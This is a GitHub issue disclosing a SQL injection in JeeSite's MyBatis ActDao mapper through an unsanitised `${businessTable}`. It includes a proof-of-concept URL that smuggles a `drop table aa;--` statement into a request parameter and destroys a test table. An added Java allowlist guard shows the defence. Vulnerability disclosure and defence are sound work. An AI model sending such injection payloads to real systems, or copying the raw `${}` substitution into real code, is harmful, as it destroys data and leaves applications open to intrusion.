thinkgem / jeesite

Java rapid development platform based on Spring Boot, Spring MVC, Apache Shiro, MyBatis, Beetl, Bootstrap and AdminLTE, with online code generation. Modules include: organizations, roles and users, menu and button authorization, data permissions, system parameters, content management, workflow, etc. Loosely coupled design; one-click skin switching; account security settings and password policies; online scheduled task configuration; cluster support, SaaS support, and multiple data sources.
http://jeesite.com
Apache License 2.0

mybatis tablename sql injection #515

Closed. BACMiao closed this 1 year ago

BACMiao commented 1 year ago

SQL mappings

The `${businessTable}` below carries a risk of SQL injection.

src/main/resources/mappings/modules/act/ActDao.xml

```xml
<mapper namespace="com.thinkgem.jeesite.modules.act.dao.ActDao">

    <update id="updateProcInsIdByBusinessId">
        UPDATE ${businessTable} SET
            proc_ins_id = #{procInsId}
        WHERE id = #{businessId}
    </update>

</mapper>
```

RequestMapping

The `start` method of the `com.thinkgem.jeesite.modules.act.web.ActTaskController` class

[screenshot]

Call Stack

[screenshot]

SQL Injection

After the user adds `&allowMultiQueries=true` to `jdbc.url` and starts the application, Spring allows batch updates, and SQL injection becomes possible.

[screenshot]

The test table is the table `aa`.

[screenshot]

Any user executes the following URL:

url: http://localhost:8080/jeesite/a/act/task/start?procDefKey=test_audit&title=dd&businessTable=79&businessId=oa_test_audit%20set%20proc_ins_id%20=%20%271%27%20where%20id=%2779%27;drop%20table%20aa;--

MyBatis concatenates the SQL and drops the `aa` table.

[screenshot]

When the above URL is executed again, the `aa` table no longer exists.

[screenshot]

Checking MySQL shows that the `aa` table has been deleted.

[screenshot]
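Added example, not JeeSite's code and not the fix in the linked commit: the defensive pattern for this class of bug. MyBatis `#{...}` binds a JDBC parameter and cannot carry an identifier, so a table name reaching `${...}` must be validated first; the allowlist contents, the class name and the sample values below are assumptions constructed for illustration (Java 9+ for `Set.of`).

```java
import java.util.Set;
import java.util.regex.Pattern;

/**
 * Guard for a table name that is about to be substituted with MyBatis ${...}.
 * Added example, not JeeSite code. ${...} is raw string substitution, so the
 * value is checked against an allowlist of known business tables before the
 * mapper ever sees it; the shape check is a second line of defense.
 */
public final class BusinessTableGuard {

    // Hypothetical allowlist: the business tables the workflow module may update.
    private static final Set<String> ALLOWED_TABLES = Set.of("oa_test_audit", "oa_leave");

    // Bare SQL identifier only: letters, digits, underscore; no spaces or punctuation.
    private static final Pattern IDENTIFIER = Pattern.compile("^[A-Za-z_][A-Za-z0-9_]{0,63}$");

    private BusinessTableGuard() {}

    /** Returns the table name when it is safe to substitute, otherwise throws. */
    public static String requireAllowedTable(String businessTable) {
        if (businessTable == null || !IDENTIFIER.matcher(businessTable).matches()) {
            throw new IllegalArgumentException("businessTable is not a bare identifier");
        }
        if (!ALLOWED_TABLES.contains(businessTable)) {
            throw new IllegalArgumentException("businessTable is not an allowed business table");
        }
        return businessTable;
    }

    /** Constructed inputs: one legitimate table, a bare number, and a value carrying SQL. */
    public static void main(String[] args) {
        String[] samples = {
            "oa_test_audit",
            "79",
            "oa_test_audit set proc_ins_id = '1' where id='79';drop table aa;--"
        };
        for (String s : samples) {
            try {
                System.out.println("accepted: " + requireAllowedTable(s));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

Calling `requireAllowedTable` on the controller parameter before it reaches `updateProcInsIdByBusinessId` keeps the multi-statement payload out of the mapper regardless of the `allowMultiQueries` setting.
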

heshaojin commented 1 year ago

This is an automatic vacation reply from QQ Mail. Hello, I am currently on vacation and cannot reply to your email in person. I will reply to you as soon as possible after the vacation ends.

think-gem commented 1 year ago

https://github.com/thinkgem/jeesite/commit/30750011b49f7c8d45d0f3ab13ed3a1a422655bb